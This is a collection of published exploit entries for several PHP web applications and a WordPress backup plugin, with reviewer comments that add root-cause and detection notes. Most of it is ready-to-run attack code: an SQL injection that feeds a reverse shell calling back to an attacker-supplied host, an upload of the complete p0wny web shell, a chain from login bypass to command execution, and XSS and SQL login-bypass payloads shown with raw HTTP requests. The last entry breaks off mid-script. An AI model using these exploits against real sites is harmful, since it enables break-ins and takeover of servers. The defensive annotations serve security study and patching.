
  # NOTE(review): the listing below is a single collapsed line; read from the text, its
  # structure is:
  #   first_get()              GET the admin login page and return its Set-Cookie header
  #                            (plain dict access, so a response without Set-Cookie raises KeyError)
  #   retrieve_first_admin()   time-based blind SQL injection through the UserName login field:
  #                            a conditional SLEEP(1) on one character position at a time, decided
  #                            by r.elapsed > 1s, over the printable range 32..127; stops after 100
  #                            consecutive non-delayed responses
  #   id_generator()           random lowercase name with a .php suffix
  #   login_bypass()           POST to the same login form with Password "' or ''='"
  #   rev_write()              writes a local PHP file whose system() call is built from
  #                            attacker_ip / attacker_port
  #   exploit()                multipart POST of that file to save_candidate.php as the 'image'
  #                            part, Content-Type application/x-php; the handle opened with
  #                            open(filename, 'rb') is never closed
  #   top level                GET of admin/upload/<name> via os.system('curl ...') as the trigger,
  #                            then os.system("rm " + filename); both use unquoted concatenation
  # Defender notes (everything here is visible in the text, nothing inferred):
  #   - Login form: UserName is concatenated into SQL (the SLEEP-based inference depends on it)
  #     and the Password check accepts a tautology. Parameterized queries plus a password
  #     comparison that does not depend on the SQL string fix both. Observable as a burst of
  #     POSTs to /Online_voting_system/admin/ whose response times cluster around 1s and whose
  #     UserName field carries SQL keywords.
  #   - Upload: save_candidate.php keeps the client-supplied .php name under admin/upload/.
  #     An allow-list of image extensions/MIME types, a server-chosen file name, or no script
  #     execution in the upload directory each break the chain on its own.
  1. # Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) # Exploit Author: Geiseric # Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075 # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 import requests import os import sys from requests_toolbelt.multipart.encoder import MultipartEncoder import string import random if len(sys.argv) < 4: print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>') exit() url = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] exp_url = '/Online_voting_system/admin/save_candidate.php' login_url = '/Online_voting_system/admin/' def first_get(): r = requests.get(url+login_url) return r.headers['Set-Cookie'] def retrieve_first_admin(): print("[!] Stage 1: Finding a valid admin user through SQL Injection") cookie = first_get() count = 0 i=1 flag = True admin = '' while flag: for j in range(32,128): r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie}) if (r.elapsed.total_seconds() > 1): admin += chr(j) i+=1 sys.stdout.write("\rAdmin User: "+ admin) sys.stdout.flush() count=0 else: if count == 100: flag = False break else: count += 1 print("\n[+] First admin user found!") print("[!] Starting Stage 2") return admin def id_generator(size=6, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size))+'.php' def login_bypass(cookie): username = retrieve_first_admin() print("[!] 
Stage 2 started: Bypassing Login...") r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie}) return cookie def rev_write(): name = id_generator() f = open(name,'w') f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>') f.close() print('[+] Generated file with reverse shell: ' +name) return name def exploit(cookie): print("[+] Uploading reverse shell...") filename=rev_write() multipart_data = MultipartEncoder( { # a file upload field 'image': (filename, open(filename, 'rb'), 'application/x-php'), # plain text fields 'user_name': 'admin', 'rfirstname': 'test', 'rlastname': 'test', 'rgender': 'Male', 'ryear': '1st year', 'rmname': 'test', 'rposition': 'Governor', 'party': 'test', 'save': 'save' } ) r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie}) return filename filename = exploit(login_bypass(first_get())) print("[!] Triggering...") input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.') os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s') print("[+] Cleaning up!") os.system("rm "+ filename)
  2. # Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 03 July 2021 # Exploit Author: Subhadip Nag # Author Linkedin: www.linkedin.com/in/subhadip-nag-09/ # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Online Birth Certificate System 1.1 is vulnerable to stored cross-site scripting (XSS) in the registration form because of insufficient validation of user-supplied data. # Proof of Concept (PoC) : Exploit # 1) Go to: http://localhost/OBCS/obcs/user/register.php 2) In the first name field, enter the payload: <script>alert(1)</script> 3) Click Register 4) Go to: http://localhost/OBCS/obcs/user/login.php 5) Enter your mobile number and password, then click Login 6) The XSS attack is successful. # PoC image 1) https://ibb.co/7C6g6nK
  3. # Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # CVE : N/A # Proof of Concept : 1- Log in with any user account and change the profile picture. 2- Upload any PHP shell after altering its extension to .jpg or .png (e.g. test.php.jpg). 3- Before uploading your file, intercept your traffic by using any proxy. 4- Change the file name test.php.jpg to test.php and click forward. 5- Find the path of your test.php file and try any command. ###################### REQUEST ########################################## GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/cman/members/dashboard.php Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc ####################### RESPONSE ######################################### HTTP/1.1 200 OK Date: Sat, 03 Jul 2021 11:28:16 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 X-Powered-By: PHP/8.0.3 Content-Length: 4410 Connection: close Content-Type: text/html; charset=UTF-8 Host Name: MRT OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19043 N/A Build 19043 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Murat System Boot Time: 6/25/2021, 2:51:40 PM System Manufacturer: Dell Inc. System Type: x64-based PC Processor(s): 1 Processor(s) Installed. ############################################################################
  4. # Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Proof of Concept : #Payload: <img src=x onerror=alert(1)> #Injectable parameters : amount= and trcode= ###################### REQUEST ########################################## POST /cman/members/Tithes.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 85 Origin: http://localhost Connection: close Referer: http://localhost/cman/members/Tithes.php Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc Upgrade-Insecure-Requests: 1 amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=
  # NOTE(review): single collapsed line holding a flat script (no functions). Reading order:
  #   argparse   -T/--IP, -P/--PORT, -U/--PATH, -u/--USERNAME, -p/--PASSWORD, all type=str
  #              and none marked required, so an omitted one arrives as None and the
  #              'http://' + target_ip concatenation below raises TypeError
  #   auth       POST log/pwd/wp-submit/testcookie to wp-login.php; success is decided by
  #              'wordpress_logged_in' appearing in auth.headers['Set-Cookie'] (plain dict
  #              access: no Set-Cookie header -> KeyError)
  #   token      the first token_url assignment (path with '/wp-admin/...') is overwritten by
  #              the second (with 'wp-admin/...') before any use, and init_request is fetched
  #              but never read; the token is sliced out of the admin page between '&token='
  #              and the next '"'
  #   exploit    multipart POST to admin-ajax.php?action=backup_guard_importBackup&token=...
  #              with one 'files[]' part named shell.php, declared image/png; the part body is
  #              the p0wny shell (https://github.com/flozz/p0wny-shell) inlined as a single
  #              Python string literal, which is why this line is so long
  # Defender notes, all traceable to the description block that opens the script:
  #   - Root cause is CWE-434 (CVE-2021-24155): the import endpoint accepts any file name and
  #     content from an admin-level user. The vendor change in 1.6.0 appends .sgbp but, as the
  #     description itself says, still does not verify content, so upgrading alone leaves a
  #     chaining risk.
  #   - The .htaccess "deny from all" in wp-content/uploads/backup-guard/ is not a control on
  #     Nginx and can be appended to on Apache; refusing PHP execution under uploads/ in the
  #     server configuration is the durable mitigation.
  #   - Observable as an authenticated admin-ajax.php request with
  #     action=backup_guard_importBackup whose multipart filename ends in .php, followed by a
  #     GET of wp-content/uploads/backup-guard/shell.php.
  5. # Exploit Title: Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated) # Date 02.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://backup-guard.com/products/backup-wordpress # Software Link: https://downloads.wordpress.org/plugin/backup.1.5.8.zip # Version: Before 1.6.0 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24155 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24155/README.md ''' Description: The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue: There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder, however: - Some web servers do not support .htaccess, e.g Nginx, making it useless in such case - Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid, and bypass the protection on web servers such as Apache Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present, but the file content is not verified, which could still allow chaining with an issue such as LFI or Arbitrary File Renaming to achieve RCE ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _ ____ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | ___| ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| |___ \___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |___) |__) | \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_|____/____/ * Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = 
argparse.ArgumentParser(description='Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Retrieve Token for backup: ''' token_url = "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=backup_guard_backups' # Header (Token): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/users.php', "Connection": "close", 
"Upgrade-Insecure-Requests": "1" } # Get Token: print('') print('[+] Grabbing unique Backup Plugin Wordpress Token:') token_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups' init_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/index.php' init_request = session.get(init_url).text token_request = session.get(token_url).text token_start_in = token_request.find('&token=') token_start_in = token_request[token_start_in + 7:] token = token_start_in[:token_start_in.find('"')] print(' -> Token: ' + token) ''' Exploit: ''' print('') print('[*] Starting Exploit:') exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=' + token # Header (Exploit): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups', "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------17366980624047956771255332862", "Origin": 'http://' + target_ip, "Connection": "close" } # Body (Exploit): Using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------17366980624047956771255332862\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"shell.php\"\r\nContent-Type: image/png\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n 
preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta 
name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var 
commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? 
\"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n 
makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n 
xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------17366980624047956771255332862--\r\n" session.post(exploit_url, headers=header, data=body) print('[+] Exploit done !') print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/backup-guard/shell.php') print('')
  6. # Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to an SQL injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : 1- Go to http://target.com/cman/admin 2- Enter the following payload in the username and password parameters and click login. ######################## REQUEST ############################### POST /cman/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: http://localhost Connection: close Referer: http://localhost/cman/admin/index.php Cookie: PHPSESSID=cne5l4cs93krjqobput7nv7sjc Upgrade-Insecure-Requests: 1 username=test&password=%27+or+%27a%27%3D%27a&login= ################################################################ PAYLOAD: # username : test # password : ' or 'a'='a
  # NOTE(review): single collapsed line; a flat script with one helper, format_text(), which
  # only wraps a "title : item" string in colorama colour codes and a row of '*'.
  # Everything is hard-coded: URL (a private 192.168.0.248 address), the uploaded name
  # shell.php, the registration/login form fields, and a PHP one-liner that passes
  # $_GET['cmd'] to system(). Request sequence, in order: GET URL; POST admin/index.php
  # with a tautology in both username and password; POST admin/regester.php to register a
  # user; POST the site root to log in as that user; POST create.php with the same PHP
  # string as the uimg, proof1 and proof2 file parts (declared application/php); then a
  # read-eval loop that GETs img/shell.php?cmd=<input> until 'exit'.
  # "Shell Upload" is reported as success purely on response.status_code == 200, which
  # does not by itself prove the file was stored.
  # Defender notes: the admin login concatenates both fields into SQL (fix: parameterized
  # queries plus a hashed-password comparison); create.php keeps the client-supplied file
  # name and serves it from img/ (fix: allow-list of image types, server-chosen names, no
  # script execution under img/). admin/regester.php is called right after the bypass —
  # presumably the bypassed admin session is what authorises it; verify against the
  # application. On the wire this is a POST to create.php with three identical
  # application/php parts, then repeated GETs to img/shell.php carrying a cmd query string.
  7. # Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE) # Date: July 4, 2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali #!/usr/bin/python # Description: # 1. This uses the SQL injection to bypass the admin login and create a new user # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server # 3. the shell is called from the location import requests from colorama import Fore, Back, Style ''' Description: Using the sql injeciton to bypass the login and create a user. This user creates a client with the shell as an image and uploads the shell. The shell is called by the requests library for easier use. ------------------------------------------ Developed by - Ishan Saha & HackerCTF team (https://twitter.com/hackerctf) ------------------------------------------ ''' # Variables : change the URL according to need URL="http://192.168.0.248/client/" shellcode = "<?php system($_GET['cmd']);?>" filename = "shell.php" authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"} createuser = {"fname":"ishan","lname":"saha","email":"[email 